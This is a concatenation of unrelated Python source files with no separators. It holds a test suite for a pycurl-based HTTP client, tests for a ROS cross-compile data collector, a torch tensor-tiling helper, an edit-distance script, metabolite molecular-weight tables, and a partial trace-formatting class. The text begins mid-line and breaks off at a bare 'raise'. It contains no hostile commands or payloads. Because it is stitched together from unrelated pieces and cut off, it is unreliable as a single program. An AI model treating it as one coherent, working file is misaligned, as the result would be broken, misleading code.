self.random_string(10))for x in range(10)]) def request_params(self): data = self.random_dict(10) data['url'] = build_url("get") data['method'] = 'get' return data class RequestsTestCase(BaseTestCase): def test_build_url(self): self.assertEquals(build_url("get"), HTTP_TEST_URL + "/" + "get") self.assertEquals(build_url("post"), HTTP_TEST_URL + "/" + "post") self.assertEquals(build_url("redirect", "3"), HTTP_TEST_URL + "/" + "redirect" + "/" + "3") def tests_invalid_url(self): self.assertRaises(ValueError, requests.get, "wefwefwegrer") def test_url(self): self.assertEquals(requests.get(build_url("get")).url, build_url("get")) def test_request(self): for method, method_func in TEST_METHODS: r = method_func(build_url(method)) self.assertTrue(isinstance(r, Response)) def test_HTTP_GET(self): r = requests.get(build_url("get")) self.assertEquals(r.status_code, 200) def test_HTTP_POST(self): r = requests.post(build_url("post")) self.assertEquals(r.status_code, 200) """ def test_HTTP_HEAD(self): r = requests.head(build_url("head")) self.assertEquals(r.status_code, 200) def test_HTTP_OPTIONS(self): r = requests.options(build_url("options")) self.assertEquals(r.status_code, 200) """ def test_HTTP_PUT(self): r = requests.put(build_url("put")) self.assertEquals(r.status_code, 200) r2 = requests.put(build_url("put"), data='kcjbwefjhwbcelihbflwkh') self.assertEquals(r2.status_code, 200) def test_HTTP_DELETE(self): r = requests.delete(build_url("delete")) self.assertEquals(r.status_code, 200) def test_HEADERS(self): import string headers = (("test-header", "test-header-value"), ("Another-Test-Header", "kjwbrlfjbwekjbf")) r = requests.get(build_url("headers"), headers=headers) self.assertEquals(r.status_code, 200) r_json = json.loads(r.text) for field, value in headers: self.assertEquals(r_json['headers'].get(string.capwords(field, "-")), value) def test_PARAMS(self): params = {'q': 'test param'} r = requests.get(build_url("get""?test=true"), params=params) self.assertEquals(r.status_code, 200) args = json.loads(r.text)['args'] self.assertEquals(args['q'], params['q']) self.assertEquals(args["test"], "true") def test_POST_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex r = requests.post(build_url('post'), data={random_key: random_value}) self.assertEquals(r.status_code, 200) def test_PUT_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex r = requests.put(build_url('put'), data={random_key: random_value}) self.assertEquals(r.status_code, 200) def test_POST_RAW_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex data = "%s:%s" % (random_key, random_value) r = requests.post(build_url('post'), data=data) self.assertEquals(r.status_code, 200) self.assertTrue(r.text.find(data) != -1) def test_PUT_RAW_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex data = "%s:%s" % (random_key, random_value) r = requests.put(build_url('put'), data=data) self.assertEquals(r.status_code, 200) self.assertTrue(r.text.find(data) != -1) def test_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} r = requests.post(build_url('post'), files=files) json_response = json.loads(r.text) self.assertEquals(r.status_code, 200) for k, v in list(files.items()): self.assertTrue(k in list(json_response['files'].keys())) def test_POST_DATA_and_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} random_key1 = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex r = requests.post(build_url('post'), data={random_key1: random_value2, random_key2: random_value2}, files=files) self.assertEquals(r.status_code, 200) def test_PUT_DATA_and_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} random_key1 = "key_" + uuid.uuid4().hex[:10] random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex r = requests.put(build_url('put'), data={random_key1: random_value2, random_key2: random_value2}, files=files) self.assertEquals(r.status_code, 200) def test_cookies_jar(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex cookies = ((random_key, random_value), (random_key2, random_value2)) cookies_jar = http.cookiejar.CookieJar() r1 = requests.get(build_url("cookies", "set", random_key, random_value), cookies=cookies_jar, debug=stdout_debug) self.assertEquals(r1.cookies[random_key], random_value) rtmp = requests.get(build_url("cookies", "set", random_key2, random_value2), cookies=cookies_jar, debug=stdout_debug) for cookie in cookies_jar: if cookie.name == random_key: self.assertEquals(cookie.value, random_value) r3 = requests.get(build_url('cookies'), cookies=cookies_jar, debug=stdout_debug) json_response = json.loads(r3.text) print(json_response) for k, v in cookies: self.assertEquals(json_response['cookies'][k], v) def test_send_cookies(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex cookies = ((random_key, random_value), (random_key2, random_value2)) r = requests.get(build_url('cookies'), cookies=cookies) # debug=stdout_debug) json_response = json.loads(r.text) # print(json_response) self.assertEquals(json_response['cookies'][random_key], random_value) def test_basic_auth(self): username = uuid.uuid4().hex password = uuid.uuid4().hex auth_manager = BasicAuth(username, password) r = requests.get(build_url('basic-auth', username, password), auth=auth_manager) self.assertEquals(r.status_code, 200) json_response = json.loads(r.text) # print(json_response) # self.assertEquals(json_response['password'], password) self.assertEquals(json_response['user'], username) self.assertEquals(json_response['authenticated'], True) # self.assertEquals(json_response['auth-type'], 'basic') """ def test_digest_auth(self): username = uuid.uuid4().hex password = uuid.uuid4().hex auth_manager = DigestAuth(username, password) r = requests.get(build_url('digest-auth/auth/', username, password), auth=auth_manager, allow_redirects=True) self.assertEquals(r.status_code, 200) json_response = json.loads(r.text) # self.assertEquals(json_response['password'], password) self.assertEquals(json_response['user'], username) self.assertEquals(json_response['authenticated'], True) # self.assertEquals(json_response['auth-type'], 'digest') """ def test_auth_denied(self): username = "hacker_username" password = "" http_auth = (username, password) r = requests.get(build_url('basic-auth', "username", "password"), auth=http_auth) self.assertEquals(r.status_code, 401) def test_multivalue_params(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.get(build_url("get"), params={random_key: (random_value1, random_value2)}) self.assertEquals(build_url("get?%s" % urlencode(((random_key, random_value1), (random_key, random_value2)))), r.url) json_response = json.loads(r.text) self.assertTrue(random_value1 in json_response['args'][random_key]) self.assertTrue(random_value2 in json_response['args'][random_key]) def test_multivalue_post_data(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.post( build_url("post"), data={random_key: (random_value1, random_value2)}) json_response = json.loads(r.text) # print(json_response) self.assertTrue(random_value1 in json_response['form'][random_key]) self.assertTrue(random_value2 in json_response['form'][random_key]) def test_redirect(self): r = requests.get(build_url("redirect", '3'), allow_redirects=True) self.assertEquals(r.status_code, 200) self.assertEquals(len(r.history), 3) self.assertEquals(r.url, build_url("get")) self.assertEquals(r._request_url, build_url("redirect/3").encode('utf8 ')) self.assertRaises(CurlError, requests.get, build_url("redirect", '7'), allow_redirects=True) def test_gzip(self): r = requests.get(build_url("gzip"), use_gzip=True) print((r.request._headers)) print((r.headers)) self.assertEquals(r.headers['Content-Encoding'], 'gzip') json_response = json.loads(r.text) self.assertEquals(json_response['gzipped'], True) def test_response_info(self): r = requests.get(build_url("get")) def test_unicode_domains(self): r = requests.get("http://➡.ws/pep8") self.assertEquals(r.url, 'http://xn--hgi.ws/pep8') def test_hooks(self): def pre_hook(r): r.pre_hook = True def post_hook(r): r.post_hook = True def response_hook(r): r._status_code = 700 return r r1 = requests.get(build_url("get"), hooks={'pre_request': pre_hook, 'post_request': post_hook}) self.assertEquals(r1._request.pre_hook, True) self.assertEquals(r1._request.post_hook, True) r2 = requests.get(build_url("get"), hooks={'response_hook': response_hook}) self.assertEquals(r2._status_code, 700) def test_json_response(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.get(build_url("get"), params={random_key: (random_value1, random_value2)}) self.assertEquals(build_url("get?%s" % urlencode(((random_key, random_value1), (random_key, random_value2)))), r.url) json_response = json.loads(r.text) self.assertTrue(isinstance(r.json, dict)) self.assertEquals(json_response, r.json) self.assertTrue(random_value1 in r.json['args'][random_key]) self.assertTrue(random_value2 in r.json['args'][random_key]) def test_get_encode_query(self): params = {'q': 'value with space and @'} key, value = 'email', '' response = requests.get(build_url("get""?%s=%s" % (key, value)), params=params) self.assertEquals(response.status_code, 200) self.assertEqual("{0}/get?email=user%40domain.com&q=value+with+space+and+%40".format(HTTP_TEST_URL).encode('utf8 '), response.request._url) args = json.loads(response.text)['args'] self.assertEquals(args['q'], params['q']) self.assertEquals(args[key], value) def test_get_no_encode_query(self): params = {'q': 'value with space and @'} key, value = 'email', '' # Invalid by HTTP spec try: # print(build_url("get?%s=%s" % (key, value))) response = requests.get(build_url("get?%s=%s" % (key, value)), params=params, encode_query=False) except CurlError as e: self.assertEqual(e.code, 52) else: self.assertEquals(response.status_code, 400) self.assertEqual("{0}/get?email=&q=value with space and @".format(HTTP_TEST_URL).encode('utf8'), response.request._url) def test_request_key_with_empty_value(self): key = "key" value = "" url = build_url("get""?%s=%s" % (key, value)) response = requests.get(url) self.assertEqual(url.encode('utf8'), response.request.url) def test_request_key_no_equal(self): key = "key+" url = build_url("get""?%s" % key) response = requests.get(url) self.assertEqual("{0}/get?key%2B".format(HTTP_TEST_URL).encode('utf8'), response.request.url) def test_request_key_no_equal_and_params(self): key = "key" params = {"a": "b"} url = build_url("get""?%s" % key) response = requests.get(url, params=params) self.assertEqual((url + "=" + "&a=b").encode('utf8'), response.request.url) class ResponseTestCase(BaseTestCase): def setUp(self): pass def tearDown(self): pass class RequestTestCase(BaseTestCase): def setUp(self): pass def tearDown(self): pass class UtilsTestCase(BaseTestCase): def test_case_insensitive_dict(self): test_data = { "lower-case-key": uuid.uuid4().hex, "UPPER-CASE-KEY": uuid.uuid4().hex, "CamelCaseKey": uuid.uuid4().hex} cidict = CaseInsensitiveDict(test_data) for k, v in list(test_data.items()): self.assertTrue(cidict[k], v) def test_cookies_from_jar(self): test_cookie_jar = http.cookiejar.CookieJar() cookies_dict = from_cookiejar(test_cookie_jar) for cookie in test_cookie_jar: self.assertEquals(cookies_dict[cookie.name], cookie.value) def test_jar_from_cookies(self): cookies_dict = dict([(uuid.uuid4().hex, uuid.uuid4().hex) for x in range(10)]) cookies_list = [(uuid.uuid4().hex, uuid.uuid4().hex) for x in range(10)] cookiejar1 = to_cookiejar(cookies_dict) cookiejar2 = to_cookiejar(cookies_list) for cookie in cookiejar1: self.assertEquals(cookie.value, cookies_dict[cookie.name]) for cookie in cookiejar2: for k, v in cookies_list: if k == cookie.name: self.assertEquals(cookie.value, v) def test_decode_gzip(self): from gzip import GzipFile data_for_gzip = Request.__doc__ tmp_buffer = io.BytesIO() gziped_buffer = GzipFile( fileobj=tmp_buffer, mode="wb", compresslevel=7) gziped_buffer.write(data_for_gzip) gziped_buffer.close() gzipped_data = tmp_buffer.getvalue() tmp_buffer.close() self.assertEquals(data_for_gzip, decode_gzip(gzipped_data)) def test_morsel_to_cookie(self): from time import strftime, localtime time_template = "%a, %d-%b-%Y %H:%M:%S GMT" m = Morsel() m['domain'] = ".yandex" m['domain'] = ".yandex.ru" m['path'] = "/" m['expires'] = "Fri, 27-Aug-2021 17:43:25 GMT" m.key = "" m.value = "fvjlrwnlkjnf" c = morsel_to_cookie(m) self.assertEquals(m.key, c.name) self.assertEquals(m.value, c.value) for x in ('expires', 'path', 'comment', 'domain', 'secure', 'version'): if x == 'expires': self.assertEquals(m[x], strftime(time_template, localtime(getattr(c, x, None)))) elif x == 'version': self.assertTrue(isinstance(getattr(c, x, None), int)) else: self.assertEquals(m[x], getattr(c, x, None)) def test_data_wrapper(self): random_key1 = "key_" + uuid.uuid4().hex[:10] random_key2 = "key_" + uuid.uuid4().hex[:10] random_key3 = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex random_value3 = "value_" + uuid.uuid4().hex test_dict = {random_key1: random_value1, random_key2: [random_value1, random_value2], random_key3: (random_value2, random_value3)} test_list = ((random_key1, random_value1), (random_key2, [random_value1, random_value2]), (random_key3, (random_value2, random_value3))) control_list = ((random_key1, random_value1), (random_key2, random_value1), (random_key2, random_value2), (random_key3, random_value2), (random_key3, random_value3)) converted_dict = data_wrapper(test_dict) for k, v in control_list: tmp = [] for k2, v2 in converted_dict: if k2 == k: tmp.append(v2) self.assertTrue(v in tmp) converted_list = data_wrapper(test_list) for k, v in control_list: tmp = [] for k2, v2 in converted_list: if k2 == k: tmp.append(v2) self.assertTrue(v in tmp) def test_curl_post_files(self): test_files = (('field_file_name', './README.rst'), ('field_file_name2', io.open('./setup.py')), ('multiple_files_field', (io.open("./README.rst"), "./setup.py"))) curl_files_dict = make_curl_post_files(test_files) for k, v in curl_files_dict: if isinstance(v, (tuple, list)): self.assertTrue(isinstance(v, (tuple, list))) self.assertTrue(os.path.exists(v[1])) self.assertEquals(v[0], pycurl.FORM_FILE) else: assert False class AuthManagersTestCase(BaseTestCase): def test_parse_dict_header(self): value = '''username="Mufasa", realm="", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/dir/index.html", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1", opaque="5ccc069c403ebaf9f0171e9517f40e41"''' parsed_header = parse_dict_header(value) self.assertEquals(parsed_header['username'], "Mufasa") self.assertEquals(parsed_header['realm'], "") self.assertEquals(parsed_header['nonce'], "dcd98b7102dd2f0e8b11d0f600bfb0c093") self.assertEquals(parsed_header['uri'], "/dir/index.html") self.assertEquals(parsed_header['qop'], "auth") self.assertEquals(parsed_header['nc'], "00000001") def test_escape(self): self.assertEquals(urllib.parse.unquote(url_escape("http://sp.example.com/")), "http://sp.example.com/") def test_generate_nonce(self): self.assertEquals(len(generate_nonce(8)), 8) def test_generate_verifier(self): self.assertEquals(len(generate_nonce(8)), 8) def test_normalize_parameters(self): url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' parameters = 'address=41%20Decatur%20St%2C%20San%20Francisc%E2%9D%A6%2C%20CA&category=animal&q=monkeys' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\xe2\x9d\xa6,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(parameters, normalize_parameters(url)) def test_normalize_url(self): url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' control_url = "http://api.simplegeo.com/1.0/places/address.json" self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\xe2\x9d\xa6,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(control_url, normalize_url(url)) class AsyncTestCase(BaseTestCase): def success_callback(self, async_client, opener, response, **kwargs): self.assertTrue(isinstance(opener.request, Request)) self.assertTrue(isinstance(response, Response)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertTrue(response.text.find(async_client._default_user_agent) != -1) def fail_callback(self, async_client, opener, errno, errmsg, **kwargs): self.assertTrue(isinstance(async_client, AsyncClient)) def test_AsyncClient_core(self): async_client = AsyncClient(size=20) self.assertEquals(async_client._num_conn, 20) self.assertEquals(async_client._remaining, 0) self.assertEquals(async_client.success_callback, None) self.assertEquals(async_client.fail_callback, None) self.assertEquals(async_client._openers_pool, None) self.assertEquals(async_client._data_queue, []) self.assertEquals(async_client.connections_count, 0) async_client.add_handler(url=build_url("/get"), method="get", params={"get1": "get1 value", "get2": "get2 value"}, success_callback=self.success_callback, fail_callback=self.fail_callback) self.assertEquals(len(async_client._data_queue), 1) self.assertTrue(isinstance(async_client._data_queue[0], dict)) params = self.random_dict(10) async_client.get(url=build_url("/get"), params=params, success_callback=self.success_callback, fail_callback=self.fail_callback) self.assertTrue(isinstance(async_client._data_queue[1], dict)) self.assertEquals(async_client._data_queue[1]['params'], params) self.assertEquals(async_client.connections_count, 2) def test_async_get(self): async_client_global = AsyncClient(success_callback=self.success_callback, fail_callback=self.fail_callback) params = self.random_dict(10) url = build_url("get") self.assertEquals(async_client_global.get(url, params=params), async_client_global) self.assertEquals(len(async_client_global._data_queue), 1) # Test process_func def process_func(num_processed, remaining, num_urls, success_len, error_len): print(("\nProcess {0} {1} {2} {3} {4}".format(num_processed, remaining, num_urls, success_len, error_len))) self.assertEquals(num_urls, 2) def fail_callback(request, errno, errmsg, async_client, opener): self.assertTrue(isinstance(request, Request)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertEquals(async_client, async_client_global) self.assertEquals(errno, 6) self.assertEquals(errmsg, "Couldn't resolve host '{0}'".format(request.url[7:])) async_client_global.get("http://fwbefrubfbrfybghbfb4gbyvrv.com", params=params, fail_callback=fail_callback) self.assertEquals(len(async_client_global._data_queue), 2) async_client_global.start(process_func) def test_setup_opener(self): async_client = AsyncClient() data = self.random_dict(10) data['url'] = build_url("get") data['method'] = 'get' opener = async_client.get_opener() self.assertEquals(getattr(opener, 'success_callback', None), None) self.assertEquals(getattr(opener, 'fail_callback', None), None) self.assertEquals(getattr(opener, 'request', None), None) data['success_callback'] = lambda **kwargs: kwargs data['fail_callback'] = lambda **kwargs: kwargs async_client.configure_opener(opener, data) self.assertTrue(isinstance(opener.request, Request)) self.assertTrue(isinstance(opener.success_callback, FunctionType)) self.assertTrue(isinstance(opener.fail_callback, FunctionType)) def test_add_handler(self): async_client = AsyncClient() data = self.request_params() self.assertRaises(InterfaceError, async_client.add_handler, **data) data['success_callback'] = lambda **kwargs: kwargs data['fail_callback'] = lambda **kwargs: kwargs async_client.add_handler(**data) self.assertEquals(async_client._data_queue[0], data) self.assertEquals(async_client._num_urls, 1) self.assertEquals(async_client._remaining, 1) def test_get_opener(self): async_client = AsyncClient() opener = async_client.get_opener() self.assertEquals(opener.fp, None) self.assertNotEqual(opener, None) def test_AsyncClient_contextmanager(self): with AsyncClient(success_callback=self.success_callback, fail_callback=self.fail_callback) as async_client_global: params = self.random_dict(10) url = build_url("get") self.assertEquals(async_client_global.get(url, params=params), async_client_global) self.assertEquals(len(async_client_global._data_queue), 1) # Test process_func def process_func(num_processed, remaining, num_urls, success_len, error_len): print(("\nProcess {0} {1} {2} {3} {4}".format(num_processed, remaining, num_urls, success_len, error_len))) self.assertEquals(num_urls, 2) def fail_callback(request, errno, errmsg, async_client, opener): self.assertTrue(isinstance(request, Request)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertEquals(async_client, async_client_global) self.assertEquals(errno, 6) self.assertEquals(errmsg, "Couldn't resolve host '{0}'".format(request.url[7:])) async_client_global.get("http://fwbefrubfbrfybghbfb4gbyvrv.com", params=params, fail_callback=fail_callback) self.assertEquals(len(async_client_global._data_queue), 2) def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(RequestsTestCase)) suite.addTest(unittest.makeSuite(ResponseTestCase)) suite.addTest(unittest.makeSuite(RequestTestCase)) suite.addTest(unittest.makeSuite(UtilsTestCase)) suite.addTest(unittest.makeSuite(AuthManagersTestCase)) suite.addTest(unittest.makeSuite(AsyncTestCase)) return suite if __name__ == '__main__': unittest.main(defaultTest="suite") # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json from json import JSONDecodeError from pathlib import Path import pytest from ros_cross_compile.data_collector import DataCollector from ros_cross_compile.data_collector import DataWriter from ros_cross_compile.data_collector import Datum def test_datum_construction(): test_datum = Datum('test_stat', 3, 'tests', 130.222, True) assert test_datum def test_collector_construction(): test_collector = DataCollector() assert test_collector def test_data_collection(): test_collector = DataCollector() test_datum_a = Datum('test_stat_1', 3, 'tests', 130.452, True) test_datum_b = Datum('test_stat_2', 4, 'tests', 130.455, True) test_collector.add_datum(test_datum_a) test_collector.add_datum(test_datum_b) to_test_data = test_collector._data assert to_test_data[0].name == 'test_stat_1' assert to_test_data[1].name == 'test_stat_2' assert to_test_data[0].value == 3 assert to_test_data[0].unit == 'tests' assert abs(to_test_data[0].timestamp - 130.452) < 0.1 assert to_test_data[0].complete def test_timer_can_time(): test_collector = DataCollector() with test_collector.timer('test_time'): pass assert test_collector._data[0].complete assert test_collector._data[0].value > 0 def test_timer_error_handling(): test_collector = DataCollector() # The timer should not hide the exception, we expect it to add the datum value with pytest.raises(Exception): with test_collector.timer('test_time_fail'): raise Exception assert len(test_collector._data) > 0 assert test_collector._data[0].complete is False def test_data_writing(tmp_path): def load_json_validation(filename: Path) -> bool: try: with filename.open() as f: json.load(f) return True except JSONDecodeError: return False test_collector = DataCollector() test_datum_a = Datum('test_stat_1', 3, 'tests', 130.243, True) test_datum_b = Datum('test_stat_2', 4, 'tests', 130.244, True) test_collector.add_datum(test_datum_a) test_collector.add_datum(test_datum_b) test_writer = DataWriter(tmp_path) test_writer.write(test_collector) assert test_writer.write_file.exists() assert load_json_validation(test_writer.write_file) import numpy as np import torch def tile(a, dim, n_tile): """TIle the input array along the dimension. :param a: The tensor to repeat. :param dim: The dimension to repeat. :param n_tile: The number of times the dimension should be repeated. :return: The tiles torch tensor. """ init_dim = a.size(dim) repeat_idx = [1] * a.dim() repeat_idx[dim] = n_tile a = a.repeat(*repeat_idx) order_index = torch.LongTensor( np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]) ) return torch.index_select(a, dim, order_index) #Title:- Edit Distance '''Given two words word1 and word2, find the minimum number of operations required to convert word1 to word2. You have the following 3 operations permitted on a word: Insert a character Delete a character Replace a character Example 1: Input: word1 = "horse", word2 = "ros" Output: 3 Explanation: horse -> rorse (replace 'h' with 'r') rorse -> rose (remove 'r') rose -> ros (remove 'e')''' #Time and Space Complexity O(mn) #Author:- def editDistance(str1,str2,m,n): dp = [[0 for x in range(n + 1)] for x in range(m + 1)] for i in range(m + 1): for j in range(n + 1): if i == 0: dp[i][j] = j # Min. operations = j elif j == 0: dp[i][j] = i # Min. operations = i elif str1[i - 1] == str2[j - 1]: dp[i][j] = dp[i - 1][j - 1] else: dp[i][j] = 1 + min(dp[i][j - 1], # Insert dp[i - 1][j], # Remove dp[i - 1][j - 1]) # Replace return dp[m][n] str1 = "horse" str2 = "ros" print(editDistance(str1,str2,len(str1),len(str2))) viranet/info.py # VIRANET DEFINITIONS # # Metabolite (verbose to model) definitions metDict = { 'atp': 'atp[c]', # ATP, ChEBI 15422 'ctp': 'ctp[c]', # CTP, ChEBI 17677 'gtp': 'gtp[c]', # GTP, ChEBI 15996 'utp': 'utp[c]', # UTP, ChEBI 15713 'A': 'ala-L[c]', # Alaline, ChEBI 16977 'R': 'arg-L[c]', # Arginine, ChEBI 16467 'N': 'asn-L[c]', # Asparagine, ChEBI 17196 'D': 'asp-L[c]', # Aspartate, ChEBI 17053 'C': 'cys-L[c]', # Cysteine, ChEBI 17561 'Q': 'gln-L[c]', # Glutamine, ChEBI 18050 'E': 'glu-L[c]', # Glutamate, ChEBI 16015 'G': 'gly[c]', # Glycine, ChEBI 15428 'H': 'his-L[c]', # Histidine, ChEBI 15971 'I': 'ile-L[c]', # Isoleucine, ChEBI 17191 'L': 'leu-L[c]', # Leucine, ChEBI 15603 'K': 'lys-L[c]', # Lysine, ChEBI 18019 'M': 'met-L[c]', # Methionine, ChEBI 16643 'F': 'phe-L[c]', # Phenylalanine, ChEBI 17295 'P': 'pro-L[c]', # Proline, ChEBI 17203 'S': 'ser-L[c]', # Serine, ChEBI 17115 'T': 'thr-L[c]', # Threonine, ChEBI 16857 'W': 'trp-L[c]', # Tryptophan, ChEBI 16828 'Y': 'tyr-L[c]', # Tyrosine, ChEBI 17895 'V': 'val-L[c]', # Valine, ChEBI 16414 'h2o': 'h2o[c]', # H2O 'adp': 'adp[c]', # ADP 'Pi': 'pi[c]', # Phosphate 'h': 'h[c]', # Hydrogen [Proton] 'PPi': 'ppi[c]', # Pyrophosphate } # Nucleotide dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ ntpsDict = { 'atp': 507.181, # ATP, ChEBI 15422 'gtp': 483.15644, # GTP, ChEBI 17677 'ctp': 523.18062, # CTP, ChEBI 15996 'utp': 484.14116, # UTP, ChEBI 15713 (TTP is psuedo for UTP in viral genome) } # Amino Acids dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ aaDict = { 'A': 89.09322, # Alanine, ChEBI 16977 'R': 174.201, # Arginine, ChEBI 16467 'N': 132.118, # Asparagine, ChEBI 17196 'D': 133.1027, # Aspartate, ChEBI 17053 'C': 121.158, # Cysteine, ChEBI 17561 'Q': 146.14458, # Glutamine, ChEBI 18050 'E': 147.1293, # Glutamate, ChEBI 16015 'G': 75.06664, # Glycine, ChEBI 15428 'H': 155.15468, # Histidine, ChEBI 15971 'I': 131.17296, # Isoleucine, ChEBI 17191 'L': 131.17296, # Leucine, ChEBI 15603 'K': 146.18764, # Lysine, ChEBI 18019 'M': 149.21238, # Methionine, ChEBI 16643 'F': 165.18918, # Phenylalanine, ChEBI 17295 'P': 115.1305, # Proline, ChEBI 17203 'S': 105.09262, # Serine, ChEBI 17115 'T': 119.1192, # Threonine, ChEBI 16857 'W': 204.22526, # Tryptophan, ChEBI 16828 'Y': 181.18858, # Tyrosine, ChEBI 17895 'V': 117.14638, # Valine, ChEBI 16414 } # Misc. dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ miscDict = { 'PPi': 173.94332, # Pyrophosphate, ChEBI 18361 } # Nucleotides List ntpsMets = list(ntpsDict.keys()) # Amino Acids List aaMets = list(aaDict.keys()) # Avogadro's Number N_A = 6.0221409e+23 # Energy requirement coefficients # Source: . (2008). Biological Thermodynamics (2nd ed.). Cambridge: Cambridge University Press. k_atp = 4 k_ppi = 1 import sys, os, collections, linecache, prettyprinter, stackprinter, inspect from functools import singledispatchmethod, cached_property from toolz.functoolz import compose_left from itertools import count from typing import Union, TypeVar from types import CodeType from hunter.const import SYS_PREFIX_PATHS from hdlogger.utils import * COL=80 class BaseEvt: def indent(self,char='\u0020',length=0): if length: return char * length else: return char * ((len(self.stack)-1)) def static(self,static_vars): count,filename,lineno,event = static_vars s = f"i:{count:<4} ☰:{len(self.stack):<3}, {event[0]}{filename}.{lineno:<4}" return s def pseudo_static(self,symbol): s = f"{self.indent()}{symbol}" return s @property def nonstatic(self): function, f_locals = self.function, self.f_locals fmtdlns = prettyprinter.pformat(f_locals).splitlines() _first,*_rest = fmtdlns joinstr = '\n' + self.indent(length=len(function)) rv = f"{function}{_first}\n{joinstr.join(_rest)}\n" return rv nonstatic_first = True def nonstatic_rightpad(self,static_vars,depth=None): wf(f"{static_vars=}\n",'logs/nonstatic_rpad.first.log','a') def _special_cases(lines): # Union[False,Any] """hardcoded logic for unique cases case1: len(lines) == 0 case2: len(lines) == 1 case3: len(lines) >= 2 """ wf(f"{lines=}\n",'logs/_special_cases.log','a') if len(lines) == 0: return self.nonstatic if len(lines) == 1: line0 = lines[0] s = ( f"{idt}{self.symbol}" f"{line0:<{80-len(idt)}.{80-len(idt)}}|" f"├{self.static(static_vars)}┤" ) return s if len(lines) >= 2: return False s = stackprinter.format() wf(s, f"logs/nonstatic_rpad.error.log",'a') return SystemExit(f"error in nonstatic_rpad: fucked logic") def firstline(fl): s = ( f"{idt}{self.symbol}" f"{fl:<{80-len(idt)}.{80-len(idt)}}|" f"├{self.static(static_vars)}┤" ) return s def formatlines(rls): l = [ (f"{self.indent()} ." f"|{elm:<{ 80-(len(self.indent())) }}|" f"├{self.static(static_vars)}┤") for elm in rls] return '\n'.join(l) idt = self.indent() lines = self.nonstatic.strip().splitlines() if len(lines) == 0: return self.nonstatic if len(lines) == 1: return firstline(lines[0]) if len(lines) >= 2: first = firstline(lines[0]) rest = formatlines(lines[1:]) fmtdlines = f"{first}\n{rest}\n" return fmtdlines s = stackprinter.format(sys.exc_info()) wf(s, f"logs/nonstatic_rightpad.log",'a') raise 